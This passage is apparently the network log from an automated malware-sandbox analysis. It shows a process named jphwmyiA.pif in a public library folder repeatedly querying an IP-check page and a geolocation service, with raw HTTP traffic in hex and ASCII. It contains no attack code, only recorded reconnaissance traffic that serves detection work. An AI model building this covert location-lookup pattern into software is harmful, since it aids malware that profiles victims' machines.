Jan 7, 2025 13:25:42.391459942 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49795	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:19 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567508 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvW10n%2B0lvp%2FX4gTxEqAFb2%2Fidv1DAzxLjZO8oB8c%2FajSRMU%2FxAMGUPsxJonH1wKEPREfySHc5zneMzObMEFDiXrQQ4tnfxARpiqcyAcTMwXzJifG4MLIvxo4N1b6ToyQ2Ut9OD5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee05caa70c80-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1640&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1712609&cwnd=227&unsent_bytes=0&cid=e17fce7df765ad24&ts=261&x=0"
2025-01-07 12:25:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49802	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:20 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567509 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lgozNs%2BW50lQWWVWG4BhL9jaYAyqIM0IzrUD243f9bEQY2YTXRClULXhLKZ5GV%2FM0IXR%2FeoNS5MG7jOOqBzh7IWe7O9mNodYLNe%2BT%2BaDbPNz5AzXtvgKayTvEzGtShlf0SpKTQ62"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee0cca0c43a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1573&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1772920&cwnd=233&unsent_bytes=0&cid=2ff7f62a18ff775f&ts=170&x=0"
2025-01-07 12:25:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49826	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:23 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567513 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PvUIRp0SdqLjWvebqVYtA%2B8eNEB%2Bx60VyGOBZzJDv52nrUfoCGI4R0lhLRXP4eKZdp%2BtswIGGHp1JxuQNuN2gr4QXRthhF7sFWZriB0c9nvQwIgMNfn%2BbFHU0YxJ3KLHuENC0VSa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee2439865e86-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2224&min_rtt=2212&rtt_var=853&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1264616&cwnd=240&unsent_bytes=0&cid=db593b24ad213e94&ts=154&x=0"
2025-01-07 12:25:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49843	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:26 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567515 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TIbKmgzAAjG9yV2PKqUivRRXoq9Y%2BfWlVuoa0FaMYeeYPBAPql95dfl1dsXyazS8jJ0pzS7SyMbdVkQF6UyjUW8SuEwhvRCsyNoymgoCXl6vHqnaIPqPI%2BU%2FRIlC7Eld8uutVSZl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee324eaa41d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1756&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1662870&cwnd=157&unsent_bytes=0&cid=b4eb3fc4bf87a399&ts=165&x=0"
2025-01-07 12:25:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49854	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:27 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567516 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tqy%2FngOmjUfGCwE0FPNpbZ65sPVkxApjsNHdP3PsDL79nz3zKv%2B8igeWwVxVTGBVOZ82P5ifBVIM1uqZ9cih84bNDH9Q5Pa5LkJyd%2FParwDhEU9Rj9%2Fz%2Bjgl60HqFlgflR6jQse"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee3bdd5580d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1484&rtt_var=573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1880231&cwnd=252&unsent_bytes=0&cid=736b4ee0c566f155&ts=157&x=0"
2025-01-07 12:25:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49866	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:29 UTC	854	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567518 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1pHfoZJH8TO%2BvMAuWGxU%2FEAoZSbUZGNbOigLs7c9xZq%2FfzRdbwBu2LThE64Bs28EqzXQ2rNWmM8GYSHzYGhH6tk9i0cosM8Yg68f4cUqlFnJMopkOPP2pewV3DI75LxDDiyLqxM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee455a5743ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=112998&cwnd=221&unsent_bytes=0&cid=60b903ba03b55683&ts=240&x=0"
2025-01-07 12:25:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49871	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:29 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567518 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zeFIXhc7BjrUvTofjl2kxBV08AaI67Z2w1WHOFYtzbslIgkVKw0d6ZL02nB3qhxUPclGBpPACPnFHuwMAA%2BfqGizuLS%2FCGwn0E6xFVJt6xY2f%2F3XAgKK0%2FNM8GdgjCKRR0DSSZ02"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee47bd7a4276-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2229&min_rtt=2211&rtt_var=865&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1239915&cwnd=208&unsent_bytes=0&cid=559b825bf7d8fd25&ts=190&x=0"
2025-01-07 12:25:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49879	188.114.97.3	443	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:30 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-07 12:25:30 UTC	863	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567519 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mD9OYY53tl8txO%2Fr9GfIj7mdwZGD2f6%2FPTdYdEiRedr5U%2BmyvSwWOh1RXlLVJApdaxwI5eK6Bg1i6YhZkJRlSds5SvewbiXFs%2FBTp8FMuxQyHzIJ7QsHY0sj%2Bf%2BKEy%2BAzEK7xyQy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee4d3d025e73-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1709&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1682997&cwnd=201&unsent_bytes=0&cid=807e137c7d0cefed&ts=144&x=0"
2025-01-07 12:25:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49880	188.114.97.3	443	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:30 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567519 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8E2ZdJc3zJjlD7CY7FjF1NJ%2FgvTLz4mKjPzmgsTUTFFMFUJaf5wq0rZ4URMPNpHi%2Bb%2BUIkYSRrXqgyWlZsuEwbDG8Jd7RXF4zRKZ6pP0DngsidOOtlS7lh1Oml4EAnjXPadQE%2FyL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee4e69db7c9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1807&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1607044&cwnd=217&unsent_bytes=0&cid=b22a95a1787328dc&ts=137&x=0"
2025-01-07 12:25:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49887	188.114.97.3	443	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:25:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-07 12:25:31 UTC	860	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1567520 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FVMit0w8CRzKKYMzfXjL2Gt3H%2FQDK%2B9KPw1tUZbCb1TJ9OvFLeLBdYywZii9YUyGggebaJIpF9%2FGnOiWrUPxV3LJcIojG0GbY9t%2BE82UGYgCDLHh1Ek26fwTfsFHy8EnCiC%2Fzkx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe3ee51895a4374-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1552&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1784841&cwnd=32&unsent_bytes=0&cid=4963f9a11c1fb2da&ts=170&x=0"
